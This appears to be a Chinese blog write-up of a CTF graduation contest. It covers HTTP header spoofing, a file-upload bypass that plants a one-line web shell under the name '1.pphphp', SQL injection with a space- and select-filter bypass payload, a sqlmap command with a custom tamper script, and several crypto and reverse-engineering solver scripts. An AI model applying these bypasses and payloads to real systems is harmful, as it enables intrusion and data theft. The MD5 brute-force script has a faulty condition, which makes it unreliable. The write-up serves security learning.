结业赛部分题解

最新推荐文章于 2024-09-22 09:43:58 发布
原创 最新推荐文章于 2024-09-22 09:43:58 发布 · 3.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全

结业赛题部分题解

签到题

是一个很简单的web签到题,查看网页源代码,发现里面注释了一段base64对其解码就是flag:

在这里插入图片描述

HTTP

打开题目有个提示一起闯关吧,进入题目发现说不是secdriver浏览器,使用浏览器伪造轻松绕过:User-Agent:secdriver,然后又说不是admin用户,发现请求头里有个admin=0,这应该就是判断是否为ADMIN用户的依据,将其置为1绕过,然后是说不是本地,通过伪造IP为127.0.0.1进行绕过,最后是必须是德国语言才能查看flag百度了一下为DE,后来发现主办方给出了提示:
在这里插入图片描述在这里插入图片描述

black_list

一道简单的文件上传的题目,首先上传了一句话木马,发现可以直接上传成功,但是通过通过查看源码的时候发现文件的后缀php没了,猜想应该是对php进行了过滤,利用双写进行绕过即可:1.pphphp,在通过中国菜刀等工具连接即可。
在这里插入图片描述# no_space
一道sql注入的题目,根据题目的提示想到了空格过滤使用/**/就可以绕过,然后发现对select也进行了过滤,可以使用双写进行绕过:selselectect:
1、手工注入最后的payload:

-1'/**/union/**/selselectect/**/1,group_concat(id,0x23,id,email_id),3/**/from/**/emails%23

2、使用sqlmap:

sqlmap.py -u  url/?id=0 -p id -v 3 --level=3 --tamper=doubleselect.py --tamper=space2comment.py --technique=U –current-db  --batch --flush-session

在这里插入图片描述temper绕过脚本:

#!/usr/bin/env python
'''
sqlmap 双写绕过
by:shadowwolf
'''
from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    payload= payload.lower()
    payload= payload.replace('select' , 'selselectect')
    retVal=payload
    return retVal

py

简单的加密算法,看懂其中的逻辑后就可以编写解题的脚本了,先解码,在进行字符串AScii-3:

import base64

c = 'aW9kan48NGlnPGY6aDA2ZGhoMDQ0aGYwOzZoMzA3N2RpNTtkOjg1NjrCgA=='

def x(string):
    return str(base64.b64decode(string.encode()).decode('utf-8'))
    pass

def y(string):
    r = ''
    for c in string:
        r += chr(ord(c)-3)
    return r
    pass

cipher = y(x(c))
print(cipher)

MD5

题目是MD5通,使用脚本暴力破解缺失字符,并确定进行MD5判断:

import hashlib
#flag{P7?Y0OG?0XPC?ZPK}
s1 = "flag{P7"
s2 = "Y0OG"
s3 = "0XPC"
s4 = "ZPK}"

str = ['0','1','2','3','4','5','6','7','8','9','0','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
for i in str:
    for j in str:
        for k in str:
            flag = s1 + i + s2 + j + s3 + k + s4
            pre = hashlib.md5()
            pre.update(flag)
            md5 = str(pre.hexdigest())
            #9e86????007f??9a38???449a?0ea7cf
            if ('9e86' and '9a38' and '0ea7cf') in md5 :
                print md5
                print flag

Sprintf

查看程序是否加壳,然后通过IDA64位打开,找到main函数,读取伪代码:
在这里插入图片描述通过对伪代码的解读发现其flag就是flag(%s%s%s%s%s%s%s),编写解题脚本:

#include <stdio.h>

int main()
{
  long long int v16 = 95LL;
  long long int v17 = 0;
  long long int v14 = 1735290739LL;
  long long int v15 = 0;
  long long int v12 = 7234918LL;
  long long int v13 = 0;
  long long int v10 = 26990LL;
  long long int v11 = 0;
  long long int v8 = 444233509240LL;
  long long int v9 = 0;
  printf("flag{%s%s%s%s%s%s%s}", &v14, &v16, &v12, &v16, &v10, &v16, &v8);
}

在这里插入图片描述# 百度网盘
pyc文件,进行反编译py文件里有BV的提示,猜测是哔哩哔哩的视频号
访问后看到链接
在这里插入图片描述

MD5取哈希后就是flag

ICPC2023 西安区域 题解.pdf
08-28
ICPC2023 西安区域 题解 本文档提供了 ICPC2023 西安区域题解,涵盖了五个题目:A - An Easy Geometry Problem、B - Counting Multisets、C - Counting Strings、D - Deep Intervals 和 E - Dominating Point...
蓝桥杯第十二届C++省题目题解
最新发布
04-11
蓝桥杯分为多个级别,包括国家、省级、校级等,参对象广泛,覆盖了从本科生到研究生的在校学生,甚至是部分专业人士。该比旨在提高大学生的计算机软件水平,激发大学生的创新意识和实践能力。 第十二届...
CTF-CRYPTO
GDL1411983801的博客
12-31 3059
9个CTF密码学的题,链接在这,请自取。
2021-09-14
m0_57291352的博客
09-14 570
你猜猜 题目 我们刚刚拦截了,敌军的文件传输获取一份机密文件,请君速速破解。 504B03040A0001080000626D0A49F4B5091F1E0000001200000008000000666C61672E7478746C9F170D35D0A45826A03E161FB96870EDDFC7C89A11862F9199B4CD78E7504B01023F000A0001080000626D0A49F4B5091F1E000000120000000800240000000000000020000
CTF必备密码编码大全
烟敛寒林的博客
05-08 6万+
通信领域的编码 1.摩斯编码 特征特点:用点(.)和划(-)来编码范围0-9、A-Z的字符,字母不区分大小写,两个字母之间的空格用斜杠(/)或者三个点(.)或者一个划(-)表示,两个单词之间的间隔是七个点(.)。 根据摩斯编码的原理,CTF中也有出现过变种的摩斯编码,比如点(.)和划(-)用数字0和1来表示等此类变种的思路。 在线解密&工具: http://www.jb51.net/...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 2304
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTF-加密与解密(二)
→_→
08-02 4004
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 3.请破译密码 (来源:安码CTF) 1.关卡描述 密码是什么呢? 2.解题步骤 2.1用记事本打开,发现是个明文、 2.2 使用Burp的Decoder模块ASCII解码得出: flag{h1_c7f} ...
含有历年来天梯部分题解
03-05
每题上方为题目序号,代码为题解部分题解有另法
2021年CCPC河南省部分题解
qq_51746125的博客
04-30 4321
文章目录2825: 收集金币(状态机dp)2826: 使用技能(乘法逆元+组合数学)2827: 欢度佳节(位运算+枚举)2829: 闯关游戏 (DP)2834: 小凯的书架 (树状数组+二分)2835: 未成年人之友(模拟)2836: 黑曜石 (思维) 2825: 收集金币(状态机dp) 题目链接 状态机模型的dp 技能的使用与否作为两种状态 f[i][0]表示进行到第i个事件没有使用技能 f[i][1]表示进行到第i个事件使用了技能 状态转移方程: LOST事件: f[i][1] = max (f[i -
2020 CCPC网络选拔部分题解
积极的防守者的博客
09-21 3930
1002 Graph Theory Class 题意:给n个结点1,2,…n,i和j之间的边权是lcm(i+1,j+1),问最小生成树边权和 解题思路:让所有结点变成2,3,4…n+1.这样把其中所有质数向2连边,所有合数向它的因子连边。这样答案为[3,n+1]数字和+[3,n+1]质数和。然后套min25板子就行,难点是需要知道min25板子( #include <bits/stdc++.h> using namespace std; const int N = 1000010; int k
SEC Driver for ARM
02-18
SEC Driver 找了好久才找到的东东
信安CTF靶场全通关!!!
qq_69994722的博客
09-22 7570
持续更新ctf题目
CTF【解密】字符串flag被加密成已知新字符串,请解密出flag,可以使用Python解码出WriteUp
星如雨落
03-06 1万+
CTF-解密: 找出flag task.py # -*- coding: utf-8 -*- assert flag[0:5] == 'flag{' strAlphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' def encode(strOld, x, y, n): strNew = '' for i in strOld: if i in strAlphabet:
SECS/GEM之SECS Driver开发源代码
semisecs
10-07 6852
规格 : 1 .符合SEMI E5、E30、E37 的 SECS 通讯规范 2. 完善 Log 档案可查询历史通讯记录 3 .支持C、C++、C#、Labview、PLC等 软件特点: 1. 拥有完善的方案 ,软件开发时间可缩短80% 。 2. 已经集成大量的逻辑和各类的应用场景,稳定运行于几十个工厂 3. 以 DLL 模块提供API接口使用,简单方便 硬件: 1. 低至入门级别CPU ,例如扬、奔腾
Python-hashlib模块与加密算法
二进制杯莫停的博客
12-26 401
加密算法 md5、sha1、sha256加密是不可逆的,base64可逆。 借助hashlib模块,实现对明文的加密。 示例: import hashlib md5 = hashlib.md5() md5.update('how to use md5 in python hashlib?'.encode('utf-8')) print(md5.hexdigest()) 哎呀,报错了 Trace...
【总结】浏览器 User-Agent 大全
oYangYongJie的博客
09-14 2万+
【总结】浏览器 User-Agent 大全
User-Agent 如何查看及常见浏览器汇总
废人一枚的博客
02-29 1万+
前言 User-Agent:简称UA,它是一个特殊的字符串头,可以使服务器识别客户使用的操作系统及版本、浏览器及版本等信息。在做爬虫时加上此信息,可以伪装为浏览器;如果不加,很可能会被识别出为爬虫。 1、如何确定自己浏览器的User-Agent信息 1.1、打开一个浏览器,我这里以360极速浏览器为主 1.2、输入chrome://version/后,浏览器会跳出图中的界面,红框标出的“用户代理”...
SECS/GEM Driver开发使用,带例子
semisecs
11-13 3万+
SECS Driver软件demo界面 包含一些SxFy的示例,里面包含代码使用的样式。 使用简洁清楚,用户一看就熟悉使用。 稳定是该产品的重点,无论用户在什么场景下都能够保证稳定的运行,在功能保证的前提下,7*24小时稳定运行是基础。 下载地址 www.secsgem.cn 4. 代码截图 代码部分 // 新方法发送 void CSecsExampleJngDlg::OnBnClickedButtonS5f1New() { // S5F1 // <L // <B ..
CTF ——crypto ——RSA原理及各种题型总结
热门推荐
小锤队长的博客
09-23 7万+
RSA原理及各种题型总结 Table of Contents 一,原理: 信息传递的过程: rsa加密的过程: 二,CTF 中的 常见的十种类型: 1,已知 p ,q,e 求 d? 2,已知 n(比较小),e 求 d? 3,已知 公钥(n, e) 和 密文 c 求 明文 m? 4,已知密文文件 flag.enc / cipher.bin /flag.b64和 公钥文件 ...
实验吧CTF密码学部分题目总结
攀登
03-11 1万+
1.变异凯撒  http://www.shiyanbar.com/ctf/2038题目是    加密密文:afZ_r9VYfScOeO_UL^RWUc    格式:flag{ }  拿凯撒解密,栅栏解密一通乱试,并没有发现什么收获。后来看了大牛的博客才发现前四位Z_的ASCII码为97 102 90 95,题目说flag的格式为flag{} 前四位对应的ASCII码为102 108 97 103。...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值